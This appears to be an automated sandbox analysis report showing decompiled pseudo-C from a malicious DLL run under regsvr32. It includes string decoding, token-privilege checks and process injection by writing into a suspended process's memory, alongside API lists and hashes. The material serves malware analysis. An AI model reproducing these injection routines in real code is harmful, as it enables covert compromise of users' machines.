            				void* _t76;
            				void* _t77;
            
            				_t71 = _a12;
            				_t53 = __edx;
            				_v8 = __ecx;
            				_t74 = _t71;
            				if(_t71 >= __edx) {
            					L4:
            					_t54 = 0x27bf95e;
            					L5:
            					_t58 = 0;
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsw");
            					asm("movsb");
            					asm("stosd");
            					asm("stosd");
            					asm("stosd");
            					asm("stosw");
            					asm("stosb");
            					_t38 = 0;
            					if(_v28 == 0) {
            						L8:
            						_t64 = _t38;
            						if(_t64 == 0) {
            							L10:
            							lstrlenW( &_v44);
            							return _t54;
            						} else {
            							goto L9;
            						}
            						do {
            							L9:
            							_t19 = _t58 + 0x30; // 0x30
            							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
            							_t58 = _t58 + 1;
            						} while (_t58 < _t64);
            						goto L10;
            					} else {
            						goto L6;
            					}
            					do {
            						L6:
            						_t38 = _t38 + 1;
            					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
            					_t64 = 0xe;
            					if(_t38 > _t64) {
            						goto L9;
            					}
            					goto L8;
            				}
            				_t59 = _a4;
            				_a12 = 0x5a;
            				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
            					_t74 = _t74 + 1;
            					if(_t74 < _t53) {
            						continue;
            					}
            					goto L4;
            				}
            				_t76 = _t74 - _t71;
            				if(_t76 == 0) {
            					goto L4;
            				}
            				_t47 = E027A8D70(_t76 + 1); // executed
            				_t55 = _t47;
            				_v12 = _t55;
            				if(_t55 != 0) {
            					_t56 = _a4;
            					_t62 = _t55 - _t71;
            					do {
            						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
            						_t71 = _t71 + 1;
            						_t76 = _t76 - 1;
            					} while (_t76 != 0);
            					_t54 = _v12;
            					goto L5;
            				}
            				return 0x27bf95e;
            			}

            APIs
            • lstrlenW.KERNEL32(?,00000138,?,027BCA88), ref: 027A8BF7
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrlen
            • String ID: GetCurrentPath$Z
            • API String ID: 1659193697-4005238709
            • Opcode ID: 6269bc3c40dcaf366e8cee776c24dbca9669c78e13aba0e1b0fe38d87063c760
            • Instruction ID: 75b0666fb074db198386c0ac4d7cc0afb74f27b62eadd86195f5c394b3968e98
            • Opcode Fuzzy Hash: 6269bc3c40dcaf366e8cee776c24dbca9669c78e13aba0e1b0fe38d87063c760
            • Instruction Fuzzy Hash: 15214871B02745AFCB01DF6DC8A019EBB76BFCD220B144679D940AB201D731DC468791
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 299 27ac997-27ac9b7 GetTokenInformation 300 27ac9b9-27ac9c2 GetLastError 299->300 301 27ac9fd 299->301 300->301 303 27ac9c4-27ac9d4 call 27a8d70 300->303 302 27ac9ff-27aca03 301->302 306 27ac9da-27ac9ed GetTokenInformation 303->306 307 27ac9d6-27ac9d8 303->307 306->301 308 27ac9ef-27ac9fb call 27a8d86 306->308 307->302 308->307
            C-Code - Quality: 86%
            			E027AC997(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
            				long _v8;
            				void* _v12;
            				void* _t12;
            				void* _t20;
            				void* _t22;
            				union _TOKEN_INFORMATION_CLASS _t28;
            				void* _t31;
            
            				_push(_t22);
            				_push(_t22);
            				_t31 = 0;
            				_t28 = __edx;
            				_t20 = _t22;
            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
            					L6:
            					_t12 = _t31;
            				} else {
            					_t31 = E027A8D70(_v8);
            					_v12 = _t31;
            					if(_t31 != 0) {
            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
            							goto L6;
            						} else {
            							E027A8D86( &_v12, _t16);
            							goto L3;
            						}
            					} else {
            						L3:
            						_t12 = 0;
            					}
            				}
            				return _t12;
            			}

            APIs
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,027A0000,00000000,00000000,?,027ACA18,00000000,00000000,?,027ACA41), ref: 027AC9B2
            • GetLastError.KERNEL32(?,027ACA18,00000000,00000000,?,027ACA41,00001644,?,027AE0D1), ref: 027AC9B9
              • Part of subcall function 027A8D70: RtlAllocateHeap.NTDLL(00000008,?,?,027A973A,00000100,?,027A65BF), ref: 027A8D7E
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,027ACA18,00000000,00000000,?,027ACA41,00001644,?,027AE0D1), ref: 027AC9E8
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InformationToken$AllocateErrorHeapLast
            • String ID:
            • API String ID: 2499131667-0
            • Opcode ID: 2802a7017cb74efdf1b6a68ea87f279f66dc300bf614b3a453b4340c5b480014
            • Instruction ID: 988e2373d2a87baa9a3aa59f68be9c1df5c8366aee190cef6052a0e31b7f088d
            • Opcode Fuzzy Hash: 2802a7017cb74efdf1b6a68ea87f279f66dc300bf614b3a453b4340c5b480014
            • Instruction Fuzzy Hash: D3016273A01115BF8B225AA5EC59F9B7FACEE856B1710076AF509F6110EB30DD00CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 311 27abe21-27abe70 call 27a8f0a * 2 CreateProcessW
            C-Code - Quality: 79%
            			E027ABE21(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
            				struct _STARTUPINFOW _v72;
            				signed int _t11;
            
            				E027A8F0A(__edx, 0, 0x10);
            				E027A8F0A( &_v72, 0, 0x44);
            				_v72.cb = 0x44;
            				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
            				asm("sbb eax, eax");
            				return  ~( ~_t11) - 1;
            			}






            APIs
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 027ABE63
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateProcessmemset
            • String ID: D
            • API String ID: 2296119082-2746444292
            • Opcode ID: a22ed428a53db0adbc6acaa706b343081a3d04af123f70349cec63847bdcc2cc
            • Instruction ID: 4ad1c130ef04248ff860ca962130bc1e7bb0d43d93c326607aca4b5f15cbfbd0
            • Opcode Fuzzy Hash: a22ed428a53db0adbc6acaa706b343081a3d04af123f70349cec63847bdcc2cc
            • Instruction Fuzzy Hash: 69F065F1A402097EFB20E669CC0EFBF36ADDB81B10F500525BB05EB1C0E5B4AD0586B5
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 316 27ad907-27ad927 call 27ad7df 319 27ada58-27ada5b 316->319 320 27ad92d-27ad94c call 27ab6f4 316->320 323 27ada48-27ada57 call 27a8d86 320->323 324 27ad952-27ad954 320->324 323->319 326 27ad95a-27ad95c 324->326 327 27ada36-27ada46 call 27a8d86 324->327 329 27ad95f-27ad961 326->329 327->323 331 27ad967-27ad986 call 27a8f0a call 27abe21 329->331 332 27ada24-27ada30 329->332 338 27ad9e8-27ad9ec 331->338 339 27ad988-27ad99b call 27ada5c 331->339 332->324 332->327 340 27ad9ee-27ad9f0 338->340 341 27ada17-27ada1e 338->341 339->338 346 27ad99d-27ad9b5 339->346 343 27ad9f2-27ad9f8 340->343 344 27ada01-27ada11 340->344 341->329 341->332 343->344 344->341 349 27ad9b7-27ad9cc GetLastError call 27adb5a 346->349 350 27ad9e5 346->350 353 27ad9ce-27ad9d9 349->353 354 27ad9e1-27ad9e2 FindCloseChangeNotification 349->354 350->338 356 27ad9db 353->356 357 27ad9dc 353->357 354->350 356->357 357->354
            C-Code - Quality: 96%
            			E027AD907(intOrPtr __edx) {
            				intOrPtr _v8;
            				signed int _v12;
            				signed int _v16;
            				intOrPtr _v20;
            				char _v24;
            				intOrPtr _v36;
            				char _v40;
            				char _v80;
            				char _t37;
            				intOrPtr _t38;
            				signed int _t45;
            				void* _t49;
            				intOrPtr _t50;
            				intOrPtr _t52;
            				intOrPtr _t54;
            				void* _t56;
            				intOrPtr _t59;
            				void* _t62;
            				intOrPtr _t63;
            				signed int _t67;
            				intOrPtr _t69;
            				void* _t70;
            				intOrPtr _t86;
            				char _t87;
            				void* _t88;
            
            				_v16 = _v16 & 0x00000000;
            				_v20 = __edx;
            				_t86 = 0;
            				_t37 = E027AD7DF( &_v16);
            				_t87 = _t37;
            				_v24 = _t87;
            				_t89 = _t87;
            				if(_t87 == 0) {
            					return _t37;
            				}
            				_t38 =  *0x27bf8e4; // 0x47ffc00
            				E027AB6F4( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t89);
            				_v12 = _v12 & 0;
            				_t67 = _v16;
            				if(_t67 == 0) {
            					L21:
            					E027A8D86( &_v24, 0);
            					return _t86;
            				}
            				while(_t86 == 0) {
            					_t69 = 0;
            					_v8 = 0;
            					while(_t86 == 0) {
            						E027A8F0A( &_v40, _t86, 0x10);
            						_t88 = _t88 + 0xc;
            						_t49 = E027ABE21( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
            						_t94 = _t49;
            						if(_t49 >= 0) {
            							_t56 = E027ADA5C(E027A623D,  &_v40, _t94, _v20); // executed
            							if(_t56 != 0) {
            								_t59 =  *0x27bf8e0; // 0x47ff8c0
            								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
            								if(_t70 != 0) {
            									GetLastError();
            									_t62 = E027ADB5A( &_v40);
            									_t63 =  *0x27bf8e0; // 0x47ff8c0
            									if(_t62 != 0) {
            										_push(0xea60);
            										_push(_t70);
            										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
            											_t86 = _t86 + 1;
            										}
            										_t63 =  *0x27bf8e0; // 0x47ff8c0
            									}
            									FindCloseChangeNotification(_t70);
            								}
            								_t69 = _v8;
            							}
            						}
            						if(_v40 != 0) {
            							if(_t86 == 0) {
            								_t54 =  *0x27bf8e0; // 0x47ff8c0
            								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
            							}
            							_t50 =  *0x27bf8e0; // 0x47ff8c0
            							 *((intOrPtr*)(_t50 + 0x30))(_v36);
            							_t52 =  *0x27bf8e0; // 0x47ff8c0
            							 *((intOrPtr*)(_t52 + 0x30))(_v40);
            						}
            						_t69 = _t69 + 1;
            						_v8 = _t69;
            						if(_t69 < 2) {
            							continue;
            						} else {
            							break;
            						}
            					}
            					_t67 = _v16;
            					_t45 = _v12 + 1;
            					_v12 = _t45;
            					if(_t45 < _t67) {
            						continue;
            					} else {
            						break;
            					}
            					do {
            						goto L20;
            					} while (_t67 != 0);
            					goto L21;
            				}
            				L20:
            				E027A8D86(_t87, 0xfffffffe);
            				_t87 = _t87 + 4;
            				_t67 = _t67 - 1;
            			}





























            APIs
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
              • Part of subcall function 027ABE21: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 027ABE63
              • Part of subcall function 027ADA5C: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 027ADABE
              • Part of subcall function 027ADA5C: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 027ADB07
              • Part of subcall function 027ADA5C: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 027ADB24
              • Part of subcall function 027ADA5C: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 027ADB45
            • GetLastError.KERNEL32(?,?,00000001), ref: 027AD9B7
              • Part of subcall function 027ADB5A: ResumeThread.KERNELBASE(?,027AD9C5,?,?,00000001), ref: 027ADB62
            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 027AD9E2
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
            • String ID:
            • API String ID: 2212882986-0
            • Opcode ID: 30c1cd7f85f9e1bcb8f0a4ed532ec8cf9fc687044409694e72ebdd901c3154b7
            • Instruction ID: f875eb2eb850fbae28910a236160df61862bf97773187f2a7afe09103cbc41d4
            • Opcode Fuzzy Hash: 30c1cd7f85f9e1bcb8f0a4ed532ec8cf9fc687044409694e72ebdd901c3154b7
            • Instruction Fuzzy Hash: EB418231A002099FCB21DFA9D899FDE77FAFF88324F144669E515A7650DB709E00CB21
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 61%
            			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
            				long _v8;
            				intOrPtr _t15;
            				WCHAR* _t23;
            				long _t24;
            				void* _t28;
            				void* _t31;
            				intOrPtr _t36;
            				void* _t41;
            				void* _t48;
            				intOrPtr* _t49;
            
            				_push(__ecx);
            				if(_a8 != 1) {
            					__eflags = _a8;
            					if(_a8 != 0) {
            						L7:
            						__eflags = 1;
            						return 1;
            					}
            					_t15 =  *0x27bf8e0; // 0x47ff8c0
            					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
            					L3:
            					return 0;
            				}
            				E027A8D5B();
            				E027A972E();
            				 *0x27bf8f8 = _a4;
            				E027B3D53(_a4);
            				 *_t49 = 0x2b4;
            				 *0x27bf8e0 = E027AF159(0x27bca88, 0x138);
            				 *_t49 = 0xeda;
            				_t23 = E027A9F8F(0x27bca88);
            				_pop(_t41);
            				_a8 = _t23;
            				_t24 = GetFileAttributesW(_t23); // executed
            				_push( &_a8);
            				if(_t24 == 0xffffffff) {
            					E027A8D41();
            					 *_t49 = 0x525;
            					_t28 = E027A9E52(E027A109A(_t41));
            					_a8 = _t28;
            					__eflags = _t28;
            					if(_t28 != 0) {
            						_t48 = 0x54;
            						 *0x27bf8f0 = E027AF159(0x27bcbf0, _t48);
            						E027A6420(_t48, __eflags);
            						E027A8D86( &_a8, 0xfffffffe);
            						_t36 =  *0x27bf8e0; // 0x47ff8c0
            						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x9d0);
            					}
            					_v8 = 0;
            					_t31 = CreateThread(0, 0, E027A6348, 0, 0,  &_v8);
            					 *0x27bf904 = _t31;
            					__eflags = _t31;
            					if(_t31 == 0) {
            						goto L3;
            					} else {
            						goto L7;
            					}
            				}
            				E027A8D41();
            				goto L3;
            			}














            APIs
              • Part of subcall function 027A8D5B: HeapCreate.KERNELBASE(00000000,00096000,00000000,027A65BA), ref: 027A8D64
              • Part of subcall function 027AF159: GetModuleHandleA.KERNEL32(00000000,?,?,?,027BCA88,?,027A65E3,?), ref: 027AF17B
            • GetFileAttributesW.KERNELBASE(00000000), ref: 027A65F9
            • CreateThread.KERNELBASE(00000000,00000000,027A6348,00000000,00000000,?), ref: 027A6680
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Create$AttributesFileHandleHeapModuleThread
            • String ID:
            • API String ID: 607385197-0
            • Opcode ID: aec30b401ebfd9aa328e64c84e2a671855da9e558f6712b38cf57bb4debaedf6
            • Instruction ID: acac057fdf0ed8623e5cde5a0fd0cff7aa8eccd55dccf454fe6f115fe73be99a
            • Opcode Fuzzy Hash: aec30b401ebfd9aa328e64c84e2a671855da9e558f6712b38cf57bb4debaedf6
            • Instruction Fuzzy Hash: 51217471540205AFDF06BFB8D829B6937EDAF84730F148B29F129DA280EB74C5408F22
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 394 6d506b43-6d506b61 395 6d506b63-6d506b6e GetProcessHeap 394->395 396 6d506bb6-6d506bb9 394->396 397 6d506b70-6d506b74 RtlFreeHeap 395->397 398 6d506b7a-6d506ba0 395->398 397->398 398->396 399 6d506ba2 398->399 400 6d506ba4-6d506bb4 399->400 400->396 400->400
            C-Code - Quality: 100%
            			E6D506B43(intOrPtr _a4, signed int _a8) {
            				signed int _t18;
            				void* _t19;
            				signed int _t25;
            				void* _t27;
            				void* _t28;
            				intOrPtr _t29;
            
            				_t25 = _a8;
            				_t29 = _a4;
            				_t28 =  *(_t29 + 0x8c);
            				_t18 =  *(_t29 + 0x148) | _t25;
            				 *((intOrPtr*)(_t29 + 0x3c)) =  *((intOrPtr*)(_t29 + 0x3c)) - _t18;
            				if(_t28 != 0) {
            					_t19 = GetProcessHeap();
            					 *((intOrPtr*)(_t29 + 0x30)) =  *((intOrPtr*)(_t29 + 0x30)) + _t25;
            					if(_t19 != 0) {
            						RtlFreeHeap(_t19, 0, _t28); // executed
            					}
            					 *(_t29 + 0xc4) =  *(_t29 + 0xc4) |  *((intOrPtr*)(_t29 + 0x88)) + 0x00000118;
            					_t18 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x1d4)) + 0x4c)) + 0x898;
            					if(_t18 != 0x2ea7) {
            						_t27 = 0x2ea7 - _t18;
            						do {
            							_t18 =  *(_t29 + 0x124);
            							 *(_t18 + 0x24) =  *(_t18 + 0x24) | 0x0000081a;
            							_t27 = _t27 - 1;
            						} while (_t27 != 0);
            					}
            				}
            				return _t18;
            			}










            APIs
            • GetProcessHeap.KERNEL32(00000532,?,-00000484,6D5155FB,?,00002B78,?,6D51A458,?,?,6D515142,?,?,?,?,?), ref: 6D506B63
            • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 6D506B74
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: Heap$FreeProcess
            • String ID:
            • API String ID: 3859560861-0
            • Opcode ID: dba6e01c95109f24d5005f6a89051358fc16824115a5b0717516e5b75578e8a5
            • Instruction ID: e5868095f0a70c8b1806ffdf6a1a42caca46f69d162f13d52939ecf28a8c213b
            • Opcode Fuzzy Hash: dba6e01c95109f24d5005f6a89051358fc16824115a5b0717516e5b75578e8a5
            • Instruction Fuzzy Hash: C40131766017029FEB68DB79CA85B96B7F4FF55321F01882DE5AAC3A40DB70F8408B51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E027AF159(void* __ecx, void* __edx, intOrPtr _a4) {
            				char _v8;
            				char _t5;
            				struct HINSTANCE__* _t7;
            				void* _t10;
            				void* _t12;
            				void* _t22;
            				void* _t25;
            
            				_push(__ecx);
            				_t12 = __ecx;
            				_t22 = __edx;
            				_t5 = E027A9F75(_a4);
            				_t25 = 0;
            				_v8 = _t5;
            				_push(_t5);
            				if(_a4 != 0x2b4) {
            					_t7 = LoadLibraryA(); // executed
            				} else {
            					_t7 = GetModuleHandleA();
            				}
            				if(_t7 != 0) {
            					_t10 = E027AF10E(_t12, _t22, _t7); // executed
            					_t25 = _t10;
            				}
            				E027A8D2E( &_v8);
            				return _t25;
            			}











            APIs
            • GetModuleHandleA.KERNEL32(00000000,?,?,?,027BCA88,?,027A65E3,?), ref: 027AF17B
            • LoadLibraryA.KERNELBASE(00000000,?,?,?,027BCA88,?,027A65E3,?), ref: 027AF188
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID:
            • API String ID: 4133054770-0
            • Opcode ID: 8943fc75121563636d350534ac23d63538b52a9ac4f7734c3637b5c76cda592e
            • Instruction ID: 2904d409f40f612f07d6b6758ef7928c4a5f36467e419102011ccae1b38e40e8
            • Opcode Fuzzy Hash: 8943fc75121563636d350534ac23d63538b52a9ac4f7734c3637b5c76cda592e
            • Instruction Fuzzy Hash: 14F0A732700114BBD705BBADD9A895AB3EDDFC83A5714463AF506D7150DA70CD008BD1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E027ACA6B(void* __ecx, void* __esi) {
            				intOrPtr* _v8;
            				char _v12;
            				void* _v16;
            				char _v20;
            				char _v24;
            				short _v28;
            				char _v32;
            				void* _t20;
            				intOrPtr* _t21;
            				intOrPtr _t29;
            				intOrPtr _t31;
            				intOrPtr* _t33;
            				intOrPtr _t34;
            				char _t37;
            				union _TOKEN_INFORMATION_CLASS _t44;
            				char _t45;
            				intOrPtr* _t48;
            
            				_t37 = 0;
            				_v28 = 0x500;
            				_t45 = 0;
            				_v32 = 0;
            				_t20 = E027AC940(__ecx);
            				_v16 = _t20;
            				if(_t20 != 0) {
            					_push( &_v24);
            					_t44 = 2;
            					_t21 = E027AC997(_t44); // executed
            					_t48 = _t21;
            					_v20 = _t48;
            					if(_t48 == 0) {
            						L10:
            						FindCloseChangeNotification(_v16);
            						if(_t48 != 0) {
            							E027A8D86( &_v20, _t37);
            						}
            						return _t45;
            					}
            					_push( &_v12);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0x220);
            					_push(0x20);
            					_push(2);
            					_push( &_v32);
            					_t29 =  *0x27bf8e8; // 0x47ffab0
            					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
            						goto L10;
            					}
            					if( *_t48 <= 0) {
            						L9:
            						_t31 =  *0x27bf8e8; // 0x47ffab0
            						 *((intOrPtr*)(_t31 + 0x10))(_v12);
            						_t37 = 0;
            						goto L10;
            					}
            					_t9 = _t48 + 4; // 0x4
            					_t33 = _t9;
            					_v8 = _t33;
            					while(1) {
            						_push(_v12);
            						_push( *_t33);
            						_t34 =  *0x27bf8e8; // 0x47ffab0
            						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
            							break;
            						}
            						_t37 = _t37 + 1;
            						_t33 = _v8 + 8;
            						_v8 = _t33;
            						if(_t37 <  *_t48) {
            							continue;
            						}
            						goto L9;
            					}
            					_t45 = 1;
            					goto L9;
            				}
            				return _t20;
            			}





















            APIs
              • Part of subcall function 027AC940: GetCurrentThread.KERNEL32 ref: 027AC953
              • Part of subcall function 027AC940: GetLastError.KERNEL32(?,?,027ACA85,00000000,027A0000), ref: 027AC961
              • Part of subcall function 027AC997: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,027A0000,00000000,00000000,?,027ACA18,00000000,00000000,?,027ACA41), ref: 027AC9B2
              • Part of subcall function 027AC997: GetLastError.KERNEL32(?,027ACA18,00000000,00000000,?,027ACA41,00001644,?,027AE0D1), ref: 027AC9B9
            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,027A0000), ref: 027ACB0F
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$ChangeCloseCurrentFindInformationNotificationThreadToken
            • String ID:
            • API String ID: 3430231349-0
            • Opcode ID: b73cef916fa2cb5f69df33ab08fd6c71c1d748ff0004064b384da2c6fb5422d5
            • Instruction ID: 9e6628482b1ac5bda3e8ba646f0e8e8199c037f131b8a9294d3632d4ef5ec221
            • Opcode Fuzzy Hash: b73cef916fa2cb5f69df33ab08fd6c71c1d748ff0004064b384da2c6fb5422d5
            • Instruction Fuzzy Hash: AB216A32A00204AFDB12DFA9D899EAEB7F8EF88720B10456AE502E7250D7309A01CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E027A6348(void* __fp0) {
            				void* __ecx;
            				intOrPtr _t13;
            				intOrPtr _t14;
            				signed int _t16;
            				intOrPtr _t17;
            				intOrPtr _t20;
            				void* _t25;
            				intOrPtr _t26;
            				void* _t27;
            
            				_t32 = __fp0;
            				E027A64C2();
            				GetOEMCP();
            				_t13 = E027AE040(__fp0); // executed
            				 *0x27bf8e4 = _t13;
            				if(_t13 != 0) {
            					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
            					_t14 =  *0x27bf8e4; // 0x47ffc00
            					E027B3C53( *((intOrPtr*)(_t14 + 0x224)));
            					_t26 =  *0x27bf8e4; // 0x47ffc00
            					_t25 = _t27;
            					__eflags =  *(_t26 + 0x1898) & 0x00010000;
            					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
            						_t16 = E027AD907(_t26); // executed
            						__eflags = _t16;
            						_t17 =  *0x27bf8e4; // 0x47ffc00
            						if(_t16 != 0) {
            							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
            							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
            								L10:
            								__eflags = 0;
            								return 0;
            							}
            							L9:
            							E027A3540();
            							goto L10;
            						}
            						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
            						L6:
            						_t20 =  *0x27bf8e4; // 0x47ffc00
            						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
            						if(__eflags == 0) {
            							goto L9;
            						}
            						E027A618E(_t25, _t26, __eflags, _t32);
            						goto L10;
            					}
            					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
            					goto L6;
            				}
            				return _t13 + 1;
            			}













            APIs
            • GetOEMCP.KERNEL32 ref: 027A634D
              • Part of subcall function 027AE040: GetCurrentProcessId.KERNEL32 ref: 027AE067
              • Part of subcall function 027AE040: GetLastError.KERNEL32 ref: 027AE161
              • Part of subcall function 027AE040: GetSystemMetrics.USER32(00001000), ref: 027AE171
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CurrentErrorLastMetricsProcessSystem
            • String ID:
            • API String ID: 1196160345-0
            • Opcode ID: 416aedc4f119bdcf98269376e206ffc70d6c348ef45152e9efefd34faf484746
            • Instruction ID: 2c49633c3e02e84a8454037722f176b5f03197281bfcc52a24991e7bef71c22e
            • Opcode Fuzzy Hash: 416aedc4f119bdcf98269376e206ffc70d6c348ef45152e9efefd34faf484746
            • Instruction Fuzzy Hash: 2D017C75505212CFCB06EB64DA2DBA672E9EB85720F1D4BB6E11D8A510C7B04452CB92
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E6D50B523(void* __ecx, signed int _a4, signed int _a8) {
            				void* __esi;
            				void* _t8;
            				void* _t12;
            				signed int _t13;
            				void* _t15;
            				signed int _t16;
            				signed int _t18;
            				long _t19;
            
            				_t15 = __ecx;
            				_t18 = _a4;
            				if(_t18 == 0) {
            					L2:
            					_t19 = _t18 * _a8;
            					if(_t19 == 0) {
            						_t19 = _t19 + 1;
            					}
            					while(1) {
            						_t8 = RtlAllocateHeap( *0x6d55dd9c, 8, _t19); // executed
            						if(_t8 != 0) {
            							break;
            						}
            						__eflags = E6D50E89B();
            						if(__eflags == 0) {
            							L8:
            							 *((intOrPtr*)(E6D50BF62())) = 0xc;
            							__eflags = 0;
            							return 0;
            						}
            						_t12 = E6D50E440(_t15, _t16, _t19, __eflags, _t19);
            						_pop(_t15);
            						__eflags = _t12;
            						if(_t12 == 0) {
            							goto L8;
            						}
            					}
            					return _t8;
            				}
            				_t13 = 0xffffffe0;
            				_t16 = _t13 % _t18;
            				if(_t13 / _t18 < _a8) {
            					goto L8;
            				}
            				goto L2;
            			}












            APIs
            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,6D50C909,00000001,00000364,?,6D50B06B,00000001,00000001), ref: 6D50B564
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
